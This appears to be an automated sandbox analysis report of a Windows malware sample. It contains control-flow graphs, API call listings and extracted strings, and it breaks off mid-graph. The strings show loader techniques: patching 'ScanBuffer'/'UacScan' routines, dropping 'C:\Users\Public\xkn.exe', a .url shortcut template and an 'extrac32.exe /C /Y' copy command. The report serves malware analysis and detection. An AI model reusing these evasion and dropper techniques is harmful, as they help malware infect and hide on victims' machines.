                                                                              control_flow_graph 8471 29a23b3-29a2b18 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299d270 call 298480c call 298494c call 29846a4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299cec8 call 2984d8c call 2984734 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2987e20 8684 29a2b1e-29a2df0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299cec8 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c * 2 call 2984734 call 299c7b4 8471->8684 8685 29a2df5-29a3a62 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29849a4 call 29981b8 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 Sleep call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d20 call 299c724 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299cf08 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2987a90 call 299d348 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299d270 call 299d2e4 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 8471->8685 8684->8685 9129 29a3a68-29a3aad call 298480c call 298494c call 29846a4 call 2987e20 8685->9129 9130 29a5241-29a54bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 8685->9130 9129->9130 9147 29a3ab3-29a43c0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c WinExec call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 9129->9147 9276 29a54c2-29a5b14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984798 call 298494c WinExec call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298494c call 29846a4 call 299a1d4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29836a0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 9130->9276 9277 29a5ff1-29a61f0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 9130->9277 10084 29a43c6-29a461f call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 2984d20 call 2984d8c call 2984734 call 299c7b4 9147->10084 10085 29a4624-29a4b93 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29836a0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 2982f08 call 2987954 call 2984798 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 9147->10085 10021 29a5b1b-29a5df9 call 2995a7c call 2984b78 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29849a4 RtlMoveMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299a524 call 29836d0 9276->10021 10022 29a5b16-29a5b19 9276->10022 9454 29a6a2d-29a6bb0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 9277->9454 9455 29a61f6-29a6815 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 9277->9455 9633 29a7381-29a7b9a call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 9454->9633 9634 29a6bb6-29a6bc5 call 2984898 9454->9634 10373 29a681c-29a6a28 call 29849a4 call 299c978 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 EnumSystemLocalesA GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 9455->10373 10374 29a6817-29a681a 9455->10374 10750 29a7b9f-29a7c0a call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 9633->10750 9634->9633 9648 29a6bcb-29a6e9e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299d270 call 298480c call 298494c call 29846a4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2987e20 9634->9648 10054 29a717b-29a737c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29849a4 call 29981b8 9648->10054 10055 29a6ea4-29a7176 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299cec8 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c * 2 call 2984734 call 299c7b4 9648->10055 10022->10021 10054->9633 10055->10054 10084->10085 10764 29a4b98-29a4c3f call 2982f08 call 2987954 call 2984798 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10085->10764 10373->9454 10374->10373 10774 29a7c0f-29a7c16 call 2997e14 10750->10774 10804 29a4c44-29a4c4b call 2997e14 10764->10804 10778 29a7c1b-29a7c86 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10774->10778 10801 29a7c8b-29a7c92 call 2997e14 10778->10801 10805 29a7c97-29a7e01 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10801->10805 10808 29a4c50-29a4cbb call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10804->10808 10873 29a7e06-29a7e0d call 2997e14 10805->10873 10831 29a4cc0-29a4cc7 call 2997e14 10808->10831 10836 29a4ccc-29a4d19 call 298480c call 298494c call 29846a4 10831->10836 10848 29a4d1e-29a4d2b call 2994d64 10836->10848 10851 29a4d2e-29a4d45 call 29836d0 10848->10851 10875 29a7e12-29a7e7d call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10873->10875 10887 29a7e82-29a7e89 call 2997e14 10875->10887 10889 29a7e8e-29a7ef9 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10887->10889 10901 29a7efe-29a7f05 call 2997e14 10889->10901 10903 29a7f0a-29a7f75 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10901->10903 10915 29a7f7a-29a7f81 call 2997e14 10903->10915 10917 29a7f86-29a7ff1 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10915->10917 10929 29a7ff6-29a7ffd call 2997e14 10917->10929 10931 29a8002-29a8039 call 2997e14 * 4 10929->10931 10939 29a803e-29a8084 call 2997e14 * 5 10931->10939 10949 29a8089-29a80a2 call 2997e14 * 2 10939->10949 10953 29a80a7-29a80cf call 2997e14 * 3 10949->10953 10959 29a80d4-29a814e call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10953->10959 10973 29a8153-29a815a call 2997e14 10959->10973 10975 29a815f-29a832f call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 10973->10975 11029 29a8334-29a833b call 2997e14 10975->11029 11031 29a8340-29a83ab call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 11029->11031 11043 29a83b0-29a83b7 call 2997e14 11031->11043 11045 29a83bc-29a8427 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 11043->11045 11057 29a842c-29a8433 call 2997e14 11045->11057 11059 29a8438-29a845a call 29846a4 * 2 11057->11059 11063 29a845f-29a8466 call 2997e14 11059->11063 11065 29a846b-29a848d call 29846a4 * 2 11063->11065 11069 29a8492-29a8499 call 2997e14 11065->11069 11071 29a849e-29a84c0 call 29846a4 * 2 11069->11071 11075 29a84c5-29a84cc call 2997e14 11071->11075 11077 29a84d1-29a84f3 call 29846a4 * 2 11075->11077 11081 29a84f8-29a84ff call 2997e14 11077->11081 11083 29a8504-29a886c call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 11081->11083 11185 29a8871-29a8878 call 2997e14 11083->11185 11187 29a887d-29a88e8 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 11185->11187 11199 29a88ed-29a88f4 call 2997e14 11187->11199 11201 29a88f9-29a8964 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 11199->11201 11213 29a8969-29a8977 call 2997e14 ExitProcess 11201->11213
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 02987E20: GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                                • Part of subcall function 0299C7B4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
                                                                                • Part of subcall function 0299C7B4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
                                                                                • Part of subcall function 0299C7B4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
                                                                                • Part of subcall function 0299C7B4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
                                                                              • Sleep.KERNEL32(00001388,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,UacScan,029D7358,029A8D7C), ref: 029A30F8
                                                                                • Part of subcall function 0299C724: RtlInitUnicodeString.N(?,?,00000000,0299C79E), ref: 0299C74C
                                                                                • Part of subcall function 0299C724: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C762
                                                                                • Part of subcall function 0299C724: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C781
                                                                              • WinExec.KERNEL32(00000000,029A91C4), ref: 029A41BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FilePath$LibraryNameName_$AddressAttributesCacheCloseCreateDeleteExecFlushFreeHandleInitInstructionLoadModuleProcSleepStringUnicodeWrite
                                                                              • String ID: .url$C:\Users\Public\$C:\Users\Public\xkn.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$MZP$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]
                                                                              • API String ID: 2549772469-2280755070
                                                                              • Opcode ID: b9071439501b138a0ae4ff114c7108c9229e629a14fdef572aafa71ef60716d6
                                                                              • Instruction ID: 85a5606f3d206fbbb7175b1e73e9c1d3655bc23cc72181e163a66bdb50971a67
                                                                              • Opcode Fuzzy Hash: b9071439501b138a0ae4ff114c7108c9229e629a14fdef572aafa71ef60716d6
                                                                              • Instruction Fuzzy Hash: BB23F935B5021A8FEB20FBA4CC90ED9B3B6BFD9310F1455E69009EB250DB31AE819F55
                                                                              Function 029A4D4D Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 946processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 11242 29a4d4d-29a523b call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 299cc20 call 298494c call 29846a4 call 299d3f0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 11381 29a5241-29a54bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 11242->11381 11382 29a523c call 2997e14 11242->11382 11455 29a54c2-29a5b14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984798 call 298494c WinExec call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298494c call 29846a4 call 299a1d4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29836a0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 11381->11455 11456 29a5ff1-29a61f0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 11381->11456 11382->11381 12019 29a5b1b-29a5df9 call 2995a7c call 2984b78 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29849a4 RtlMoveMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299a524 call 29836d0 11455->12019 12020 29a5b16-29a5b19 11455->12020 11574 29a6a2d-29a6bb0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984898 11456->11574 11575 29a61f6-29a6815 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 11456->11575 11709 29a7381-29a8977 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 